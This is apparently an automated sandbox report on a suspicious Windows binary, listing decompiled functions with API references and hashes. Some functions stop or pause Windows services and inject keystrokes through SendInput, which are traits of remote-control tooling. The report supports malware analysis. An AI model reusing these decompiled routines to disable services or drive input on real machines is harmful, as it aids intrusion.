                                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041697A,00000000), ref: 00416E0E
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041697A,00000000), ref: 00416E20
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041697A,00000000), ref: 00416E23
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID: ziA
                                                                                                • API String ID: 221034970-331584892
                                                                                                • Opcode ID: 5526fed76c8f8bf79b05816383fd671647c2f0a412dd3caeeeffb9ef9c7d9df4
                                                                                                • Instruction ID: 4a585f2d2376b6d5ac9c9cece389b6aa10fb0938e1b78b412e20c9ed5c4354ef
                                                                                                • Opcode Fuzzy Hash: 5526fed76c8f8bf79b05816383fd671647c2f0a412dd3caeeeffb9ef9c7d9df4
                                                                                                • Instruction Fuzzy Hash: 17F022325003186BD210AF65DC89DBF3B6CDB80B65F10002AFE0596182DA38CD8595E4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00416F3A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45serviceCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00416F3A(char _a4) {
				struct _SERVICE_STATUS _v32;
				void* _t6;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x40);
				_t1 =  &_a4; // 0x41687a
				_t20 = _t6;
				_t19 = OpenServiceW(_t20, E00401EDD(_t1), 0x40);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 3,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				E00401EE2();
				return _t16;
			}








                                                                                                0x00416f45
                                                                                                0x00416f49
                                                                                                0x00416f51
                                                                                                0x00416f54
                                                                                                0x00416f63
                                                                                                0x00416f67
                                                                                                0x00416f88
                                                                                                0x00416f8b
                                                                                                0x00416f8e
                                                                                                0x00416f69
                                                                                                0x00416f6a
                                                                                                0x00416f6a
                                                                                                0x00416f93
                                                                                                0x00416fa0

                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041687A,00000000), ref: 00416F49
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041687A,00000000), ref: 00416F5D
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041687A,00000000), ref: 00416F6A
                                                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041687A,00000000), ref: 00416F79
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041687A,00000000), ref: 00416F8B
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041687A,00000000), ref: 00416F8E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID: zhA
                                                                                                • API String ID: 221034970-181969981
                                                                                                • Opcode ID: a4d7d90dc3ff4088f4becfd339648ac572e134073d05af946aa15752de00ce0c
                                                                                                • Instruction ID: 24d2e802748d46b42a904b5a9824533a6e6e85186698bd289f6eec39f182f73e
                                                                                                • Opcode Fuzzy Hash: a4d7d90dc3ff4088f4becfd339648ac572e134073d05af946aa15752de00ce0c
                                                                                                • Instruction Fuzzy Hash: 0EF0C2325002186BD210AF65EC89EBF3B6CDB85B55F11002AFF099A192DA38DD8695F9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004447E8, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 69%
                                                                                                			E004447E8(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x46c00c; // 0x4cc22724
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E004414B9(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E00430A5B(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E004318FD(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E00443906(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E004318FD(_t101);
									goto L36;
								}
								_t62 = E00443906(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E004318FD(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E00440C6C(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E004519B0();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E00443906(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E00440C6C(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004519B0();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}


























                                                                                                0x004447ed
                                                                                                0x004447ee
                                                                                                0x004447ef
                                                                                                0x004447f6
                                                                                                0x004447fa
                                                                                                0x004447fb
                                                                                                0x00444801
                                                                                                0x00444807
                                                                                                0x0044480d
                                                                                                0x00444810
                                                                                                0x00444810
                                                                                                0x00444813
                                                                                                0x00444815
                                                                                                0x00444815
                                                                                                0x00444813
                                                                                                0x00444817
                                                                                                0x0044481c
                                                                                                0x00444823
                                                                                                0x00444826
                                                                                                0x00444826
                                                                                                0x00444842
                                                                                                0x00444848
                                                                                                0x0044484d
                                                                                                0x004449e0
                                                                                                0x004449f3
                                                                                                0x00444853
                                                                                                0x00444853
                                                                                                0x00444856
                                                                                                0x0044485b
                                                                                                0x0044485f
                                                                                                0x004448b3
                                                                                                0x004448b3
                                                                                                0x004448b5
                                                                                                0x004448b7
                                                                                                0x004449d5
                                                                                                0x004449d5
                                                                                                0x004449d7
                                                                                                0x004449d8
                                                                                                0x00000000
                                                                                                0x004449de
                                                                                                0x004448c8
                                                                                                0x004448ce
                                                                                                0x004448d0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004448d6
                                                                                                0x004448e8
                                                                                                0x004448ed
                                                                                                0x004448f1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004448fe
                                                                                                0x00444938
                                                                                                0x0044493b
                                                                                                0x0044493e
                                                                                                0x00444940
                                                                                                0x00444942
                                                                                                0x00444944
                                                                                                0x00444990
                                                                                                0x00444990
                                                                                                0x00444992
                                                                                                0x00444992
                                                                                                0x00444994
                                                                                                0x004449ce
                                                                                                0x004449cf
                                                                                                0x00000000
                                                                                                0x004449d4
                                                                                                0x004449a8
                                                                                                0x004449ad
                                                                                                0x004449af
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004449b3
                                                                                                0x004449b4
                                                                                                0x004449b5
                                                                                                0x004449b8
                                                                                                0x004449f4
                                                                                                0x004449f7
                                                                                                0x004449ba
                                                                                                0x004449ba
                                                                                                0x004449bb
                                                                                                0x004449bb
                                                                                                0x004449c8
                                                                                                0x004449ca
                                                                                                0x004449cc
                                                                                                0x004449fd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004449cc
                                                                                                0x00444946
                                                                                                0x00444949
                                                                                                0x0044494b
                                                                                                0x0044494d
                                                                                                0x0044494f
                                                                                                0x00444952
                                                                                                0x00444957
                                                                                                0x00444972
                                                                                                0x00444974
                                                                                                0x0044497e
                                                                                                0x00444980
                                                                                                0x00444981
                                                                                                0x00444983
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00444985
                                                                                                0x0044498b
                                                                                                0x0044498b
                                                                                                0x00000000
                                                                                                0x0044498b
                                                                                                0x00444959
                                                                                                0x0044495b
                                                                                                0x0044495f
                                                                                                0x00444964
                                                                                                0x00444966
                                                                                                0x00444968
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044496a
                                                                                                0x00000000
                                                                                                0x0044496a
                                                                                                0x00444900
                                                                                                0x00444905
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044490b
                                                                                                0x0044490d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00444924
                                                                                                0x00444929
                                                                                                0x0044492d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00444933
                                                                                                0x00444866
                                                                                                0x00444868
                                                                                                0x0044486a
                                                                                                0x00444872
                                                                                                0x00444891
                                                                                                0x00444893
                                                                                                0x0044489d
                                                                                                0x0044489f
                                                                                                0x004448a0
                                                                                                0x004448a2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004448a8
                                                                                                0x004448ae
                                                                                                0x004448ae
                                                                                                0x00000000
                                                                                                0x004448ae
                                                                                                0x00444876
                                                                                                0x0044487a
                                                                                                0x0044487f
                                                                                                0x00444883
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00444889
                                                                                                0x00000000
                                                                                                0x00444889

                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043BE96,0043BE96,?,?,?,00444A39,00000001,00000001,03E85006), ref: 00444842
                                                                                                • __alloca_probe_16.LIBCMT ref: 0044487A
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00444A39,00000001,00000001,03E85006,?,?,?), ref: 004448C8
                                                                                                • __alloca_probe_16.LIBCMT ref: 0044495F
                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,03E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004449C2
                                                                                                • __freea.LIBCMT ref: 004449CF
                                                                                                  • Part of subcall function 00440C6C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0042FF99,?,?,00401696,?,?,?,?,?), ref: 00440C9E
                                                                                                • __freea.LIBCMT ref: 004449D8
                                                                                                • __freea.LIBCMT ref: 004449FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3864826663-0
                                                                                                • Opcode ID: b4e1e2f10b3423daa5f40f4cc138610c0013d1e46d1004ca469c9909f36bc7f0
                                                                                                • Instruction ID: d02bb2a041cccfade64d9aa9d91115d3dccb2f1a9088e3ccbf10952fb6e82d87
                                                                                                • Opcode Fuzzy Hash: b4e1e2f10b3423daa5f40f4cc138610c0013d1e46d1004ca469c9909f36bc7f0
                                                                                                • Instruction Fuzzy Hash: 115103B2610216ABFB249F75CC41FBB77A9EB80764F14462BFD04D6240EB38DC509658
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00415C6C, Relevance: 12.1, APIs: 8, Instructions: 101keyboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000), ref: 00415CA0
                                                                                                • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00415CBE
                                                                                                • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00415CDB
                                                                                                • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00415CED
                                                                                                • SendInput.USER32(00000001,00000001,0000001C), ref: 00415D04
                                                                                                • SendInput.USER32(00000001,00000001,0000001C), ref: 00415D21
                                                                                                • SendInput.USER32(00000001,00000001,0000001C), ref: 00415D3D
                                                                                                • SendInput.USER32(00000001,?,0000001C,?), ref: 00415D5A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InputSend
                                                                                                • String ID:
                                                                                                • API String ID: 3431551938-0
                                                                                                • Opcode ID: d65834eab052123d68c5b2b91191ac281f6b0e762dfb1d59326661db85ab796e
                                                                                                • Instruction ID: 2ccc25ff1b7fe1a998df7354d480448ce1667da0ef0d996d49ebc9f0d066bfe0
                                                                                                • Opcode Fuzzy Hash: d65834eab052123d68c5b2b91191ac281f6b0e762dfb1d59326661db85ab796e
                                                                                                • Instruction Fuzzy Hash: 0C313E71D9026CA9FB109BD1DC46FFFBB78AF58B14F04000AE600AA1C2D6E995C58BE5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004422C4, Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 88%
                                                                                                			E004422C4(void* __ebx, signed int __ecx, void* __edi, void* __esi, char _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
				signed int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v22;
				char _v24;
				signed int _v28;
				signed int* _v32;
				signed int _v33;
				signed int** _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				void* _v64;
				signed int _t86;
				intOrPtr _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				void* _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				intOrPtr _t105;
				signed int _t110;
				void* _t111;
				signed int _t116;
				signed int _t117;
				signed int _t129;
				void* _t133;
				signed int _t135;
				intOrPtr _t143;
				signed short* _t144;
				intOrPtr _t145;
				signed int** _t146;
				signed int _t147;
				signed int* _t148;
				signed int _t149;
				signed int _t152;
				signed short** _t154;
				signed int _t155;
				signed int _t159;
				signed int _t163;
				intOrPtr* _t171;
				signed short _t172;
				signed short* _t173;
				signed int** _t174;
				void* _t175;
				void* _t177;
				signed short* _t179;
				intOrPtr* _t180;
				intOrPtr* _t181;
				signed int* _t183;
				signed int _t184;
				signed int** _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;

				_t149 = __ecx;
				_t86 =  *0x46c00c; // 0x4cc22724
				_v8 = _t86 ^ _t187;
				_t171 = _a12;
				_v52 = _a4;
				_t143 = _a24;
				_v40 = _a16;
				_v48 = _t171;
				_v44 = _t143;
				_t183 = _a20;
				_v32 = _t183;
				_t91 = _a8;
				if(_t91 == 0) {
					_t179 =  *(_t143 + 0x154);
				} else {
					if(_t91 == 1) {
						_t179 =  *(_t143 + 0x158);
					} else {
						_t179 =  *(_t143 + 0x15c);
					}
				}
				if( *((intOrPtr*)(_t143 + 0xac)) == 1) {
					goto L113;
				} else {
					_t163 = _t149 & 0xffffff00 | _a8 == 0x00000002;
					_v24 = 0x76c +  *((intOrPtr*)(_t171 + 0x14));
					_v33 = _t163;
					_v22 =  *((intOrPtr*)(_t171 + 0x10)) + 1;
					_v18 =  *((intOrPtr*)(_t171 + 0xc));
					_v16 =  *((intOrPtr*)(_t171 + 8));
					_v14 =  *((intOrPtr*)(_t171 + 4));
					_v12 =  *_t171;
					_v10 = 0;
					_t194 = _t163;
					if(_t163 == 0) {
						__eflags = 0;
						_t129 = E004435BE(0, _t183, 0,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0, 0);
					} else {
						_t129 = E00443700(0, _t183, _t194,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0);
					}
					_t147 = _t129;
					if(_t147 == 0) {
						goto L113;
					} else {
						_t175 = _t147 + _t147;
						_t165 = _t175 + 8;
						asm("sbb eax, eax");
						if((_t175 + 0x00000008 & _t129) == 0) {
							_t184 = 0;
							__eflags = 0;
							L18:
							_v28 = _t184;
							if(_t184 == 0) {
								L30:
								E004318FD(0);
								_t183 = _v32;
								while(1) {
									L113:
									_t172 =  *_t179 & 0x0000ffff;
									__eflags = _t172;
									if(_t172 == 0) {
										break;
									}
									__eflags =  *_t183;
									if( *_t183 == 0) {
										L28:
										L29:
										return E00430A5B(_v8 ^ _t187);
									}
									_v32 = 0;
									_t152 = 0;
									__eflags = 0;
									_v28 = _t179;
									_t144 = _t179;
									_t94 = _t172 & 0x0000ffff;
									do {
										_t144 =  &(_t144[1]);
										_t152 = _t152 + 1;
										__eflags =  *_t144 - _t94;
									} while ( *_t144 == _t94);
									_t95 = _t172 & 0x0000ffff;
									_v28 = _t144;
									_t145 = _v44;
									__eflags = _t95 - 0x64;
									if(__eflags > 0) {
										_t96 = _t95 - 0x68;
										__eflags = _t96;
										if(_t96 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L110:
												_push(0x49);
												L111:
												_pop(_t97);
												_t84 =  &_v52; // 0x44283b
												_t98 = E0044168E(_t145, _t153, _t179,  *_t84, _t97, _v48, _v40, _t183, _t145, _v32);
												_t188 = _t188 + 0x1c;
												__eflags = _t98;
												if(_t98 == 0) {
													 *((intOrPtr*)(E00438932())) = 0x16;
													goto L29;
												}
												L112:
												_t179 = _v28;
												continue;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L110;
											}
											L108:
											_t154 = _v40;
											_t179 =  &(_t179[1]);
											 *( *_t154) = _t172;
											 *_t154 =  &(( *_t154)[1]);
											 *_t183 =  *_t183 - 1;
											continue;
										}
										_t102 = _t96 - 5;
										__eflags = _t102;
										if(_t102 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L105:
												_push(0x4d);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L105;
											}
											goto L108;
										}
										_t103 = _t102 - 6;
										__eflags = _t103;
										if(_t103 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L100:
												_push(0x53);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L100;
											}
											goto L108;
										}
										_t104 = _t103 - 1;
										__eflags = _t104;
										if(_t104 == 0) {
											_t105 = _v48;
											__eflags =  *((intOrPtr*)(_t105 + 8)) - 0xb;
											if( *((intOrPtr*)(_t105 + 8)) > 0xb) {
												_t173 =  *(_t145 + 0x150);
											} else {
												_t173 =  *(_t145 + 0x14c);
											}
											__eflags = _t152 - 1;
											if(_t152 != 1) {
												L91:
												_t155 =  *_t173 & 0x0000ffff;
												__eflags = _t155;
												if(_t155 == 0) {
													goto L112;
												}
												_t146 = _v40;
												while(1) {
													__eflags =  *_t183;
													if( *_t183 <= 0) {
														goto L112;
													}
													_t173 =  &(_t173[1]);
													 *( *_t146) = _t155;
													 *_t146 =  &(( *_t146)[0]);
													 *_t183 =  *_t183 - 1;
													_t155 =  *_t173 & 0x0000ffff;
													__eflags = _t155;
													if(_t155 != 0) {
														continue;
													}
													goto L112;
												}
											} else {
												__eflags =  *_t183;
												if( *_t183 <= 0) {
													goto L91;
												}
												_t180 = _v40;
												 *((short*)( *_t180)) =  *_t173;
												 *_t180 =  *_t180 + 2;
												 *_t183 =  *_t183 - 1;
											}
											goto L112;
										}
										__eflags = _t104 != 5;
										if(_t104 != 5) {
											goto L108;
										}
										_t153 = _t152;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x79);
											goto L111;
										}
										_t153 = _t153;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x59);
										goto L111;
									}
									if(__eflags == 0) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L75:
											_push(0x64);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L75;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x61);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x41);
										goto L111;
									}
									__eflags = _t95 - 0x27;
									if(_t95 == 0x27) {
										_t110 = _t152 & 0x80000001;
										__eflags = _t110;
										if(__eflags < 0) {
											__eflags = (_t110 - 0x00000001 | 0xfffffffe) + 1;
										}
										_t179 =  &(_t179[_t152]);
										if(__eflags == 0) {
											_t159 =  *_t179 & 0x0000ffff;
											__eflags = _t159;
											if(_t159 == 0) {
												goto L28;
											}
											_t174 = _v40;
											while(1) {
												__eflags =  *_t183;
												if( *_t183 == 0) {
													goto L113;
												}
												_t111 = 0x27;
												_t179 =  &(_t179[1]);
												__eflags = _t159 - _t111;
												if(_t159 == _t111) {
													goto L113;
												}
												 *( *_t174) = _t159;
												 *_t174 =  &(( *_t174)[0]);
												 *_t183 =  *_t183 - 1;
												_t159 =  *_t179 & 0x0000ffff;
												__eflags = _t159;
												if(_t159 != 0) {
													continue;
												}
												goto L113;
											}
										}
										continue;
									}
									__eflags = _t95 - 0x41;
									if(_t95 == 0x41) {
										L41:
										_t116 = E0044E1A1(_t145, _t179, _t183, _t179, L"am/pm");
										__eflags = _t116;
										if(_t116 != 0) {
											_t117 = E0044E1A1(_t145, _t179, _t183, _t179, L"a/p");
											_pop(_t153);
											__eflags = _t117;
											if(_t117 == 0) {
												_v28 =  &(_t179[3]);
											}
										} else {
											_t153 =  &(_t179[5]);
											_v28 =  &(_t179[5]);
										}
										_push(0x70);
										goto L111;
									}
									__eflags = _t95 - 0x48;
									if(_t95 == 0x48) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L55:
											_push(0x48);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L55;
										}
										goto L108;
									}
									__eflags = _t95 - 0x4d;
									if(_t95 == 0x4d) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L50:
											_push(0x6d);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L50;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x62);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x42);
										goto L111;
									}
									__eflags = _t95 - 0x61;
									if(_t95 != 0x61) {
										goto L108;
									}
									goto L41;
								}
								goto L28;
							}
							_t203 = _v33;
							if(_v33 == 0) {
								_t133 = E004435BE(_t165, _t184, __eflags,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147, 0);
							} else {
								_t133 = E00443700(_t165, _t184, _t203,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147);
							}
							_t181 = _t184;
							_t177 = _t133 - 1;
							if(_t177 <= 0) {
								L27:
								E004318FD(_t184);
								goto L28;
							} else {
								_t148 = _v32;
								_t185 = _v40;
								while( *_t148 > 0) {
									_t135 =  *_t181;
									_t181 = _t181 + 2;
									 *( *_t185) = _t135;
									 *_t185 =  &(( *_t185)[0]);
									 *_t148 =  *_t148 - 1;
									_t177 = _t177 - 1;
									if(_t177 > 0) {
										continue;
									}
									break;
								}
								_t184 = _v28;
								goto L27;
							}
						}
						asm("sbb eax, eax");
						_t137 = _t129 & _t175 + 0x00000008;
						_t165 = _t175 + 8;
						if((_t129 & _t175 + 0x00000008) > 0x400) {
							__eflags = _t175 - _t165;
							asm("sbb eax, eax");
							_t186 = E00440C6C(_t165, _t137 & _t165);
							_v28 = _t186;
							_pop(_t165);
							__eflags = _t186;
							if(__eflags == 0) {
								goto L30;
							}
							 *_t186 = 0xdddd;
							L14:
							_t184 = _t186 + 8;
							goto L18;
						}
						asm("sbb eax, eax");
						E004519B0();
						_t186 = _t188;
						_v28 = _t186;
						if(_t186 == 0) {
							goto L30;
						}
						 *_t186 = 0xcccc;
						goto L14;
					}
				}
			}
































































                                                                                                0x004422c4
                                                                                                0x004422cc
                                                                                                0x004422d3
                                                                                                0x004422d9
                                                                                                0x004422dc
                                                                                                0x004422e3
                                                                                                0x004422e6
                                                                                                0x004422ec
                                                                                                0x004422ef
                                                                                                0x004422f3
                                                                                                0x004422f6
                                                                                                0x004422fa
                                                                                                0x004422fd
                                                                                                0x00442314
                                                                                                0x004422ff
                                                                                                0x00442302
